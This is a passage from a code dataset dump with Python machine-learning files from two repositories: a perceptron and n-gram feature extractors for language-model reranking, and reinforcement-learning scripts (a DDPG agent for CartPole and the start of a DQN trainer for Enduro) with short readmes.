"text": "\"\"\"\nSimple `numpy`-based implementation of Perceptron.\n\"\"\"\n\nfrom numpy.linalg import norm\n\ndef perceptron(pairs, model, print_progress=False, rate=0.01):\n \"\"\"Train the given model on the given pairs of sentences.\"\"\"\n counter = 0\n for pair in pairs:\n counter += 1\n perceptron_update(pair, model, rate=rate)\n if print_progress and counter % 10000 == 0:\n print('{} pairs...'.format(counter))\n print('Model - norm: {}'.format(norm(model.params)))\n\ndef perceptron_update(pair, model, rate=0.01):\n \"\"\"Perform the perceptron update on the given model using the\n given pair of sentences.\"\"\"\n s1, s2 = pair\n score1 = model.score(s1)\n score2 = model.score(s2)\n wer1 = s1.wer()\n wer2 = s2.wer()\n score_diff = score1 - score2\n wer_diff = wer1 - wer2\n # same decision?\n if score_diff * wer_diff >= 0:\n # do nothing, they had the same classification\n pass\n else:\n # they had different classifications, so update the model.\n s1_vector = s1.feature_vector * wer_diff * rate\n s2_vector = s2.feature_vector * wer_diff * rate\n new_params = model.params + s1_vector - s2_vector\n model.params = new_params\n"
},
{
"alpha_fraction": 0.5675932765007019,
"alphanum_fraction": 0.5702067017555237,
"avg_line_length": 28.43356704711914,
"blob_id": "5aac1d94a89f9ff1d9a6605f958c5be96d92e85b",
"content_id": "a6d3d8f85fb7edc23821a8d6309db90b6f88bd6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4209,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 143,
"path": "/semlm/feature_extractor.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFEs return maps. This is in part for compatibilty with sklearn.\n\"\"\"\n\nfrom itertools import tee\nfrom collections import defaultdict\nfrom sklearn.feature_extraction import DictVectorizer\n\n\n# Should this keep it's own list of features somwhere?\n\n# Should this have its own \"fit\" function? Takes an iterator\n# over sentences as input?\n\nclass FE(object):\n \"\"\"Generic feature extractor.\"\"\"\n\n # Feature vectorizer--maps from features to ints\n def __init__(self):\n \"\"\"Set the vectorizer to None.\"\"\"\n self.vec = None\n\n def extract(self, s):\n \"\"\"An abstract method for extracting features (non-integer).\"\"\"\n raise NotImplementedError()\n\n def size(self):\n \"\"\"The size of the featurizer's vocabulary (i.e. how many features\n this FE could produce).\"\"\"\n return len(self.vec.vocabulary_)\n\n def extract_ids(self, s):\n \"\"\"Given a sentence object return a sequence of feature IDs for that\n sentence.\"\"\"\n if not self.vec:\n raise Exception(\"Can't extract feature IDs without a vectorizer.\")\n return self.vec.transform(self.extract(s))\n\n def fix(self, features):\n \"\"\"`features` can be a mapping or an iterable over mappings?\"\"\"\n vec = DictVectorizer()\n vec.fit([features])\n self.vec = vec\n\nclass CompoundFE(FE):\n \"\"\"A compound feature extractor, contains multiple feature extractors and\n returns the set of features produced by all of them.\"\"\"\n\n def __init__(self, fes):\n \"\"\"Initialize with a sequence of feature extractors.\"\"\"\n super(CompoundFE, self).__init__()\n self.fes = fes\n\n # How much does something like this help/hurt performance?\n # def extract(self, s):\n # return itertools.chain.from_iterable(map(lambda x: x.extract(s), self.fes))\n def extract(self, s):\n \"\"\"Extract (non-int) features from sentence `s`.\"\"\"\n features = {}\n for fe in self.fes:\n features.update(fe.extract(s))\n return features\n\nclass UnigramFE(FE):\n \"\"\"Unigram feature extractor. Values can be either binary (is the word\n present or not) or counts (how many times does the feature occur).\"\"\"\n\n def __init__(self, binary=False):\n super(UnigramFE, self).__init__()\n self.binary = binary\n\n def extract(self, s):\n \"\"\"Returns a map.\"\"\"\n features = defaultdict(int)\n for word in s.words:\n if self.binary:\n features[word] = 1\n else:\n features[word] += 1\n return features\n\n\nclass BigramFE(FE):\n \"\"\"Bigram feature extractor.\"\"\"\n\n def __init__(self, binary=False):\n super(BigramFE, self).__init__()\n self.binary = binary\n\n def extract(self, s):\n \"\"\"Returns a map.\"\"\"\n features = defaultdict(int)\n a, b = tee(s.words)\n next(b, None)\n for x, y in zip(a, b):\n feat = ' '.join([x, y])\n if self.binary:\n features[feat] = 1\n else:\n features[feat] += 1\n return features\n\nclass TrigramFE(FE):\n \"\"\"Trigram feature extractor.\"\"\"\n\n def __init__(self, binary=False):\n super(TrigramFE, self).__init__()\n self.binary = binary\n\n def extract(self, s):\n \"\"\"Returns a map.\"\"\"\n features = defaultdict(int)\n a, b, c = tee(s.words, 3)\n next(b, None)\n next(c, None)\n next(c, None)\n for x, y, z in zip(a, b, c):\n feat = ' '.join([x, y, z])\n if self.binary:\n features[feat] = 1\n else:\n features[feat] += 1\n return features\n\n# class NgramFE(FE):\n# I'm not sure if a completely general implementation is possible...?\n# def extract(self, s):\n# \"\"\"Returns a map.\"\"\"\n# features = defaultdict(int)\n# n = 3\n# iterators = tee(s.words, n)\n# print(iterators)\n# for i in range(2, n):\n# for j in range(i):\n# next(iterators[i], None)\n# print(iterators)\n# for ngram in zip(iterators):\n# print(ngram)\n# if self.binary:\n# features[ngram] = 1\n# else:\n# features[ngram] += 1\n# return features\n"
},
{
"alpha_fraction": 0.6656976938247681,
"alphanum_fraction": 0.7180232405662537,
"avg_line_length": 30.272727966308594,
"blob_id": "84d5ddbc50daf525f319e13d876424a9464c3e0f",
"content_id": "50a4b71801228dec88d86837ffefc62d6713e1f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 344,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 11,
"path": "/.pylintrc",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "[FORMAT]\nmax-line-length=120\n\n[MESSAGES CONTROL]\ndisable = fixme,too-many-arguments,logging-format-interpolation,too-many-locals,multiple-statements,too-few-public-methods\n\n[BASIC]\n# Allow one and two character names in a number of places.\nargument-rgx=[a-z_][a-z0-9_]{0,30}$\nvariable-rgx=[a-z_][a-z0-9_]{0,30}$\nattr-rgx=[a-z_][a-z0-9_]{0,30}$\n"
},
{
"alpha_fraction": 0.5840978622436523,
"alphanum_fraction": 0.5902140736579895,
"avg_line_length": 32.367347717285156,
"blob_id": "098a028a4e8a959b53755ddfd36135b2dccaa54a",
"content_id": "0c1a63cf4c028af5cc8f38ef60d6e462a48ae065",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1635,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 49,
"path": "/semlm/model.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "\"\"\"\nClasses for representing language models.\n\"\"\"\n\nclass LM(object):\n \"\"\"Represents a language model.\"\"\"\n pass\n\nclass WSLM(LM):\n \"\"\"The way I'm going to use this, the scores will be added\n to a baseline LM score (coming from the lattice/nbest).\n\n Model requires:\n vec - Feature vectorizer\n fe - feature extractor\n params - sklearn model/parameters\n \"\"\"\n\n def __init__(self, vec, fe, params, lmwt=14):\n self.vec = vec\n self.fe = fe\n self.params = params\n self.lmwt = lmwt\n\n # TODO: Is there anything dumb and slow going on here?\n # Don't have to recompute this if the parameter vector hasn't changed...\n # But what's a good place to save the values?\n def score(self, s):\n \"\"\"Compute the model's score for the given sentence.\"\"\"\n fv = s.feature_vector\n product = fv.dot(self.params.T)[0, 0]\n return s.score(lmwt=self.lmwt) + product\n\n def print_feature_weights(self, max_=None, threshold=None):\n \"\"\"Print up to `max_` feature weights, for weights above the given `threshold`.\"\"\"\n print('Feature weights:')\n feature_weights = []\n for i in range(len(self.vec.get_feature_names())):\n name = self.vec.get_feature_names()[i]\n val = self.params[0, i]\n if not threshold or abs(val) >= threshold:\n feature_weights.append((name, val))\n\n items = sorted(feature_weights, key=lambda x: abs(x[1]), reverse=True)\n if max_:\n items = items[:max_]\n\n for name, val in items:\n print('{:20} {:>8.2f}'.format(str(name), val))\n"
},
{
"alpha_fraction": 0.6578947305679321,
"alphanum_fraction": 0.7631579041481018,
"avg_line_length": 8.5,
"blob_id": "2137fecef4023c8057078bb3c7e539738b2cf37b",
"content_id": "1d9c3713a96f8543ea44e6c22b1328edfcad64a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "asr_tools\nsklearn\nnumpy\nscipy==0.18.1\n"
},
{
"alpha_fraction": 0.5433255434036255,
"alphanum_fraction": 0.5433255434036255,
"avg_line_length": 14.527273178100586,
"blob_id": "f0219adc5f80b4598d813bc0201fb141c2cc6280",
"content_id": "8bc9d28719ae00ea996d1ce079723209e1b3af7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 854,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 55,
"path": "/docs/semlm.rst",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "semlm package\n=============\n\nSubmodules\n----------\n\nsemlm.example module\n--------------------\n\n.. automodule:: semlm.example\n :members:\n :undoc-members:\n\nsemlm.feature_extractor module\n------------------------------\n\n.. automodule:: semlm.feature_extractor\n :members:\n :undoc-members:\n\nsemlm.features module\n---------------------\n\n.. automodule:: semlm.features\n :members:\n :undoc-members:\n\nsemlm.model module\n------------------\n\n.. automodule:: semlm.model\n :members:\n :undoc-members:\n\nsemlm.perceptron module\n-----------------------\n\n.. automodule:: semlm.perceptron\n :members:\n :undoc-members:\n :show-inheritance:\n\nsemlm.pro module\n----------------\n\n.. automodule:: semlm.pro\n :members:\n :undoc-members:\n\nsemlm.sklearn module\n--------------------\n\n.. automodule:: semlm.sklearn\n :members:\n :undoc-members:\n"
},
{
"alpha_fraction": 0.6145966649055481,
"alphanum_fraction": 0.6235595345497131,
"avg_line_length": 27.925926208496094,
"blob_id": "f6c160e740998ca863d09ebb69bc790a9e83fdc1",
"content_id": "81df809cbd8d5c0115b304573458741b95c4ddc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 781,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 27,
"path": "/semlm/pro.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCreate paired examples for pairwise ranking optimization.\n\"\"\"\n\nimport random\nimport itertools\n\ndef nbest_pairs(nbests):\n \"\"\"Return an iterator of ALL pairs.\"\"\"\n for nbest in nbests:\n # Can't we just return this iterator?\n for s1, s2 in itertools.combinations(nbest.sentences, 2):\n yield (s1, s2)\n\ndef nbest_pairs_random(nbests, n):\n \"\"\"Return an iterator of n random pairs from each n-best.\"\"\"\n for nbest in nbests:\n for _ in range(n):\n if len(nbest.sentences) > 1:\n yield random.sample(nbest.sentences, 2)\n\ndef nbest_hyp_best_pairs(nbests):\n \"\"\"Return an iterator of best and oracle pairs.\"\"\"\n for nbest in nbests:\n hyp = nbest.hyp()\n best = nbest.oracle_hyp()\n yield(hyp, best)\n"
}
] | 9 |
MorganWoods/ReinforcementLearning
|
https://github.com/MorganWoods/ReinforcementLearning
|
5350718d978c1e0608cbbd3fafa07c585cd5a749
|
3be4385b59506e4a8775eba21093a83e4c224c7c
|
287c57ce5a5bfbf3ec30fe5c4b5debe2ee76beea
|
refs/heads/master
| 2020-04-25T04:04:42.104447 | 2020-03-23T03:03:01 | 2020-03-23T03:03:01 | 172,498,563 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5655609369277954,
"alphanum_fraction": 0.5785743594169617,
"avg_line_length": 41.80348205566406,
"blob_id": "27c0463f7de7d5d239d863223ae0ddaac63315b6",
"content_id": "dbee8b155e341b81229ac4a88b6359387a324555",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17213,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 402,
"path": "/Gym_Cartpole/DDPG_CartPole_v0.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 10 16:20:24 2019\n\n@author: menghao\n\nMy intergration version of ddpg\nRuning on Gym-CartPole_v0 environment\nmotivated by blog Patrick Emami ddpg and morvan's ddpg\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport gym\nimport tflearn\nfrom collections import deque\nimport datetime # for taking note\nimport random\n\ntf.reset_default_graph()\n# ===================================\n# Hyper parameters\n# ===================================\nMAX_EPISODES = 10000\nMAX_EP_STEPS = 200\nLR_A = 0.0001\nLR_C = 0.001\nGAMMA = 0.99 # reward discount\nTAU = 0.001 # soft replacement\nMEMORY_CAPACITY = 10000000 #0000\nBATCH_SIZE = 64\nRENDER = False\nENV_NAME = 'CartPole-v0'\nSEED = True\n\nNOISE_LEVEL = 0. # env noise\nNOISE_ENTRY = 4\nnoise_flag = 0\n\nLOGPATH = 'log/ddpg'\nNOTE = 'ddpg add 3 entries noise free on state'\nACTIONS = [0,1]\n\n# ===================================\n# Functions\n# ===================================\ndef takeNote(note): # todo: add network structure\n f = open(\"LOG_DDPG.txt\", \"a+\")\n f.write(\"\\nDDPG=====%s====\\n\" % datetime.datetime.now())\n f.write(\"env:%s, max_ep:%s, max_ep_steps:%s, LR_A:%s, LR_C:%s, GAMMA:%s, TAU:%s, Memory:%s, Batchsize:%s, NoiseLevel:%s, LogPath:%s, Seed:%s \\n\"\n % (ENV_NAME,MAX_EPISODES,MAX_EP_STEPS,LR_A,LR_C,GAMMA,TAU,MEMORY_CAPACITY,BATCH_SIZE,NOISE_LEVEL,LOGPATH,SEED))\n f.write(note)\n f.close()\n\ndef printenv(e):\n observation_high = e.observation_space.high\n observation_low = e.observation_space.low\n observation_shape = e.observation_space.shape\n reward_range = e.reward_range\n #action_high = e.action_space.high\n #action_low = e.action_space.low\n action_shape = e.action_space.shape\n #env_configure = e.configure\n print('\\n----------env info-------------\\n')\n #print(env_configure)\n print('\\nobservation shape and bound:', observation_shape, observation_high, observation_low,\n '\\naction shape and bound:', action_shape, #action_high, action_low,\n '\\nreward range:', reward_range)\n print('-------------------------------\\n')\n state_dim = observation_shape[0] #+ NOISE_ENTRY\n action_dim = 1\n #action_bound = action_high\n # ensure action bound is symmetric\n #assert (action_high == -action_low)\n action_bound = 1\n return state_dim, action_dim, action_bound\n\ndef state_noise(s,level,num_entry):\n global noise_flag\n if noise_flag <= 5000: \n noise = np.random.uniform(low=-1,high=1,size=(num_entry,))\n# noise = np.array([np.random.uniform(-1,1),np.random.uniform(-1,1),np.random.uniform(-1,1)])# todo: change the dimensional as shape\n noise = level * noise\n if noise_flag > 5000:\n noise = s\n noise_flag += 1\n if noise_flag ==10000:\n noise_flag = 0\n \n s = np.append(s,noise,axis=0) \n #print('noiseflag', noise_flag)\n #s = s + noise \n return s\n\ndef build_summaries():\n episode_reward = tf.Variable(0.)\n tf.summary.scalar(\"Reward\", episode_reward)\n episode_ave_max_q = tf.Variable(0.)\n tf.summary.scalar(\"Qmax_Value\", episode_ave_max_q)\n\n summary_vars = [episode_reward, episode_ave_max_q]\n summary_ops = tf.summary.merge_all()\n\n return summary_ops, summary_vars\n# ===================================\n# Class\n# ===================================\nclass replayBuffer(object):\n def __init__(self, buffer_size):\n # the right side of the deque contains the most recent experience\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque(maxlen = buffer_size)\n \n def add(self, s, a, r, t, s2):\n experience = (s, a, r, t, s2)\n self.buffer.append(experience)\n if self.count < self.buffer_size:\n self.count += 1\n def size(self):\n return self.count\n \n def sample_batch(self, batch_size):\n batch = []\n if self.count < batch_size:\n batch = random.sample(self.buffer, self.count)\n else:\n batch = random.sample(self.buffer, batch_size)\n s_batch = np.array([_[0] for _ in batch])\n a_batch = np.array([_[1] for _ in batch])\n r_batch = np.array([_[2] for _ in batch])\n t_batch = np.array([_[3] for _ in batch])\n s2_batch = np.array([_[4] for _ in batch])\n return s_batch, a_batch, r_batch, t_batch, s2_batch \n def clear(self):\n self.buffer.clear()\n self.count = 0\n \nclass DDPG(object):\n def __init__(self, sess, a_dim, s_dim, a_bound, lr_a, lr_c, tau, batch_size, gamma):\n '''-------Hyperparameters-------'''\n self.sess = sess\n self.a_dim = a_dim\n self.s_dim = s_dim\n self.a_bound = a_bound\n self.lr_a = lr_a\n self.lr_c = lr_c\n self.tau = tau\n self.batch_size = batch_size\n self.gamma = gamma\n \n '''-------actor-------'''\n # Actor network\n self.a_inputs, self.a_out, self.a_scaled_out = self.actorNetwork()\n self.a_eval_params = tf.trainable_variables()\n #self.network_params = tf.trainable_variables()\n # Target network\n self.target_inputs, self.target_out, self.a_target_scaled_out = self.actorNetwork()\n #self.target_network_params = tf.trainable_variables()[len(self.network_params):]\n # Networks parameters \n# self.a_eval_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/eval')\n# self.a_targ_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/target') \n# self.a_eval_params = tf.trainable_variables()\n self.a_targ_params = tf.trainable_variables()[len(self.a_eval_params):]\n \n # Op for periodically updating actor target network with online network\n self.a_update_target_network_params = \\\n [self.a_targ_params[i].assign(tf.multiply(self.a_eval_params[i], self.tau) + \n tf.multiply(self.a_targ_params[i], 1. - self.tau))\n for i in range(len(self.a_targ_params))]\n \n # Gradient from critic network\n self.action_gradient = tf.placeholder(tf.float32, [None, self.a_dim]) \n # Combine the gradients here\n self.unnormalized_actor_gradients = tf.gradients(self.a_scaled_out, self.a_eval_params, -self.action_gradient)\n self.actor_gradients = list(map(lambda x: tf.div(x, self.batch_size), self.unnormalized_actor_gradients))\n # Optimization Op for actor\n self.a_optimize = tf.train.AdamOptimizer(self.lr_a).apply_gradients(zip(self.actor_gradients, self.a_eval_params))\n self.a_num_trainable_vars = len(self.a_eval_params) + len(self.a_targ_params)\n \n '''-------critic-------'''\n \n # Critic network\n self.c_inputs, self.c_action, self.c_out = self.criticNetwork()\n self.c_eval_params = tf.trainable_variables()[self.a_num_trainable_vars:]\n\n # Target network\n self.c_target_inputs, self.c_target_action, self.c_target_out = self.criticNetwork() \n # Networks parameters\n# self.c_eval_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/eval')\n# self.c_targ_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/target')\n self.c_targ_params = tf.trainable_variables()[(len(self.c_eval_params) + self.a_num_trainable_vars):] \n # Op for periodically updating critic target network with online network\n self.c_update_target_network_params = \\\n [self.c_targ_params[i].assign(tf.multiply(self.c_eval_params[i], self.tau) + \n tf.multiply(self.c_targ_params[i], 1. - self.tau))\n for i in range(len(self.c_targ_params))]\n # Network target (y_i)\n self.predicted_q_value = tf.placeholder(tf.float32, [None, 1]) # one Q value for each env.step(a)\n # Optimization Op for critic\n self.c_loss = tflearn.mean_square(self.predicted_q_value, self.c_out) \n self.c_optimize = tf.train.AdamOptimizer(self.lr_c).minimize(self.c_loss)\n # get the gradient of the net w.r.t. the action\n self.c_action_grads = tf.gradients(self.c_out, self.c_action)\n #\n \n '''-------critic functions-------'''\n def criticNetwork(self): \n inputs = tflearn.input_data(shape=[None, self.s_dim])\n action = tflearn.input_data(shape=[None, self.a_dim])\n# tf.summary.histogram('inputs',inputs)\n# tf.summary.histogram('action',action)\n net_1 = tflearn.fully_connected(inputs, 400)\n net_1 = tflearn.layers.normalization.batch_normalization(net_1)\n net_1 = tflearn.activations.relu(net_1)\n # Add the action tensor in the 2nd hidden layer\n t1 = tflearn.fully_connected(net_1, 300)\n t2 = tflearn.fully_connected(action, 300)\n net_2 = tflearn.activation(tf.matmul(net_1, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')\n # Linear layer connected to 1 output representing Q(s,a)\n # Weights are init to Uniform\n w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)\n out = tflearn.fully_connected(net_2, 1, weights_init=w_init)\n return inputs, action, out\n \n def c_train(self, inputs, action, predicted_q_value):\n return self.sess.run([self.c_out, self.c_optimize], feed_dict={self.c_inputs: inputs, self.c_action: action,\n self.predicted_q_value: predicted_q_value}) \n def c_predict(self, inputs, action):\n return self.sess.run(self.c_out, feed_dict={self.c_inputs: inputs, self.c_action: action})\n \n def c_predict_target(self, inputs, action):\n return self.sess.run(self.c_target_out, feed_dict={self.c_target_inputs: inputs, self.c_target_action: action})\n \n def c_action_gradients(self, inputs, actions):\n return self.sess.run(self.c_action_grads, feed_dict={self.c_inputs: inputs, self.c_action: actions})\n \n def c_update_target_network(self):\n self.sess.run(self.c_update_target_network_params)\n \n '''-------actor functions-------'''\n def actorNetwork(self): \n inputs = tflearn.input_data(shape=[None, self.s_dim]) # None for batch learning\n net_1 = tflearn.fully_connected(inputs, 400)\n net_1 = tflearn.layers.normalization.batch_normalization(net_1)\n net_1 = tflearn.activations.relu(net_1)\n net_2 = tflearn.fully_connected(net_1, 300)\n net_2 = tflearn.layers.normalization.batch_normalization(net_2)\n net_2 = tflearn.activations.relu(net_2)\n # Final layer weights are init to Uniform[-3e-3, 3e-3]\n w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003) \n out = tflearn.fully_connected(net_2, self.a_dim, activation='softmax', weights_init=w_init) # tanh from -1 to 1\n # Scale output to positive and negative action bound\n scaled_out = out\n print('outshape', out.shape)\n #scaled_out = tf.multiply(out, self.a_bound)\n return inputs, out, scaled_out\n \n def a_train(self, inputs, a_gradient):\n self.sess.run(self.a_optimize, feed_dict={self.a_inputs: inputs, self.action_gradient: a_gradient})\n \n def a_predict(self, inputs):\n return self.sess.run(self.a_scaled_out, feed_dict={self.a_inputs: inputs})\n \n def a_predict_target(self, inputs):\n return self.sess.run(self.a_target_scaled_out, feed_dict={self.target_inputs: inputs})\n \n def a_update_target_network(self):\n self.sess.run(self.a_update_target_network_params)\n \n def a_get_num_trainable_vars(self):\n return self.a_num_trainable_vars\n\n\n# Taken from https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py, which is\n# based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab \nclass OrnsteinUhlenbeckActionNoise:\n def __init__(self, mu, sigma=0.3, theta=.15, dt=1e-2, x0=None):\n self.theta = theta\n self.mu = mu\n self.sigma = sigma\n self.dt = dt\n self.x0 = x0\n self.reset()\n\n def __call__(self):\n x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \\\n self.sigma * np.sqrt(self.dt) * np.random.normal(size=self.mu.shape)\n self.x_prev = x\n return x\n\n def reset(self):\n self.x_prev = self.x0 if self.x0 is not None else np.zeros_like(self.mu)\n\n def __repr__(self):\n return 'OrnsteinUhlenbeckActionNoise(mu={}, sigma={})'.format(self.mu, self.sigma)\n \n# ===================================\n# Train \n# =================================== \ndef train(sess, env, module, max_ep, max_step, logpath, buffer, render, actor_noise,stateNoiseLevel,num_entry):\n summary_ops, summary_vars = build_summaries()\n sess.run(tf.global_variables_initializer())\n writer = tf.summary.FileWriter(logpath, sess.graph)\n # Initialize target network weights? why\n module.a_update_target_network()\n module.c_update_target_network()\n #replay_buffer=buffer\n # Needed to enable BatchNorm. \n # This hurts the performance on Pendulum but could be useful\n # in other environments.\n # tflearn.is_training(True)\n #print('mark132')\n\n for i in range(max_ep):\n s = env.reset() \n #s = state_noise(s, stateNoiseLevel, num_entry)\n ep_reward = 0\n ep_ave_max_q = 0\n \n for j in range(max_step):\n if render:\n env.render()\n # add exploration noise\n p_a = module.a_predict(np.reshape(s, (1, module.s_dim))) #+ actor_noise()\n a = int(np.random.choice(ACTIONS,1,[p_a, 1-p_a]))\n s2, r, terminal, info = env.step(a)\n # s2 = state_noise(s2, stateNoiseLevel, num_entry)\n buffer.add(np.reshape(s, (module.s_dim,)), a, r, terminal, np.reshape(s2, (module.s_dim,)))\n \n # Keep adding experience to the memory until there are at least minibatch size samples\n if buffer.size() > module.batch_size:\n s_batch, a_batch, r_batch, t_batch, s2_batch = buffer.sample_batch(module.batch_size) \n \n # Calculate targets\n #a_action = module.a_predict_target(s2_batch)\n a_batch = np.reshape(a_batch,(len(a_batch),1))\n target_q = module.c_predict_target(s2_batch, module.a_predict_target(s2_batch))\n \n y_i = []\n for k in range(module.batch_size):\n if t_batch[k]:\n y_i.append(r_batch[k])\n else:\n y_i.append(r_batch[k] + module.gamma * target_q[k])\n \n # Update the critic given the targets\n predicted_q_value, _ = module.c_train(s_batch, a_batch, np.reshape(y_i, (module.batch_size, 1)))\n ep_ave_max_q += np.amax(predicted_q_value)\n \n # Update the actor policy using the sampled gradient\n a_outs = module.a_predict(s_batch)\n grads = module.c_action_gradients(s_batch, a_outs)\n module.a_train(s_batch, grads[0])\n \n # Update target networks\n module.a_update_target_network()\n module.c_update_target_network()\n \n s = s2\n ep_reward += r\n \n if terminal or j == max_step - 1:\n \n summary_str = sess.run(summary_ops, feed_dict={summary_vars[0]: ep_reward,\n summary_vars[1]: ep_ave_max_q / float(j)})\n writer.add_summary(summary_str, i)\n writer.flush()\n \n print('| Reward: {:d} | Episode: {:d} | Qmax: {:.4f} | Steps: {:d}'.format(int(ep_reward), \\\n i, (ep_ave_max_q / float(j)), j))\n break\n \n# ===================================\n# Main \n# =================================== \ndef main():\n with tf.Session() as sess:\n \n env = gym.make(ENV_NAME)\n #env = env.unwrapped\n s_dim, a_dim, a_bound = printenv(env)\n if SEED: \n env.seed(1)\n tf.set_random_seed(2)\n np.random.seed(3)\n random.seed(4)\n # sess, a_dim, s_dim, a_bound, lr_a, lr_c, tau, batch_size, gamma\n #print('mark0')\n module = DDPG(sess, a_dim, s_dim, a_bound, lr_a=LR_A, lr_c=LR_C, tau=TAU, batch_size=BATCH_SIZE, gamma=GAMMA)\n #print('mark1')\n buffer = replayBuffer(buffer_size=MEMORY_CAPACITY)\n actor_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(a_dim)) \n #print('mark12')\n\n train(sess, env, module, max_ep=MAX_EPISODES, max_step=MAX_EP_STEPS, logpath=LOGPATH,\n buffer=buffer, render=RENDER, actor_noise=actor_noise, stateNoiseLevel=NOISE_LEVEL, num_entry=NOISE_ENTRY\n )\n \nif __name__ == '__main__': \n takeNote(note=NOTE)\n main()\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7318840622901917,
"alphanum_fraction": 0.7318840622901917,
"avg_line_length": 26.399999618530273,
"blob_id": "fdf51c3e6be524a127c972c667c21b0598cb6325",
"content_id": "348a77835e91a7f1d022b6c1ea3a5a6725efb393",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 228,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 5,
"path": "/Mono_network/readme.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "单网络是我的一种设想. 参考 NAF 那篇论文,\n\n只有一个 pg 网络,输出动作后想办法把 Q 弄出来, 然后用 Q 对 a 求梯度更新网络.\n\n- research on NAF method first, then think about to modify it.\n\n"
},
{
"alpha_fraction": 0.7857142686843872,
"alphanum_fraction": 0.7857142686843872,
"avg_line_length": 27,
"blob_id": "5b4f31b24c86f8c0a67d0fd8a46f3e74cf62136a",
"content_id": "76bc1d640370b8357c761e5fba98adf2726abdb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/Gym_MountainCar/readme.md",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "## mountain car environment\n"
},
{
"alpha_fraction": 0.4893081784248352,
"alphanum_fraction": 0.5053459405899048,
"avg_line_length": 33.064517974853516,
"blob_id": "86378f906d6366659bafa7cb4255f6aebe742242",
"content_id": "7df101b0e670c3f05b3d1a9005dcb82c417f5b37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3180,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 93,
"path": "/Gym_Enduro/WuEnduro.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 28 13:38:52 2018\n\nrunning Enduro with tensorflow\n\nEnduro env source page: https://github.com/openai/gym/blob/master/gym/envs/atari/atari_env.py\nfuture: add soft update\n@author: menghaw1\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport gym\nimport matplotlib.pyplot as plt\n\nfrom preprocess import Preprocess # process state and reward\nfrom configure import *\nfrom DuelingDQN import *\n\ntf.reset_default_graph() # for reseting the variable info, otherwise it cannot re run\n#------------ other ---------------#\n# np.random.seed(1)\n# tf.set_random_seed(1)\n'''########### training ###########'''\n\ndef train(): \n total_step = 0\n \n for ep in range (NUM_EPISODES):\n s = env.reset()\n s = process.process_state(s) #(1,80,80,4) \n ep_reward = 0\n ep_step = 0\n ep_loss = 0\n \n for st in range (NUM_EP_STEPS):\n if RENDER:\n env.render()\n \n \n a = module.choose_action(s) # Todo # s: float32 (1, 80, 80), array\n s_, r, done, info = env.step(a) \n s_ = process.process_state(s_)\n #r = process.process_reward(r) \n module.remember(s, a, r, s_) \n# if done == 1:\n# print ('done:',1)\n ep_reward += r\n ep_step += 1\n \n if (total_step > MEMEOY_SIZE) and (st % TRAIN_FREQUENCY==0):\n module.learn() # Todo \n s = s_\n total_step += 1\n\n if (st == NUM_EP_STEPS - 1) or done:\n result = tf.Summary(value = [\n #tf.Summary.Value(tag='ep_step', simple_value=ep_step),\n tf.Summary.Value(tag='ep_reward', simple_value=ep_reward)\n ])\n writer.add_summary(result, ep)\n print('Ep:', ep, '|ep_reward:', 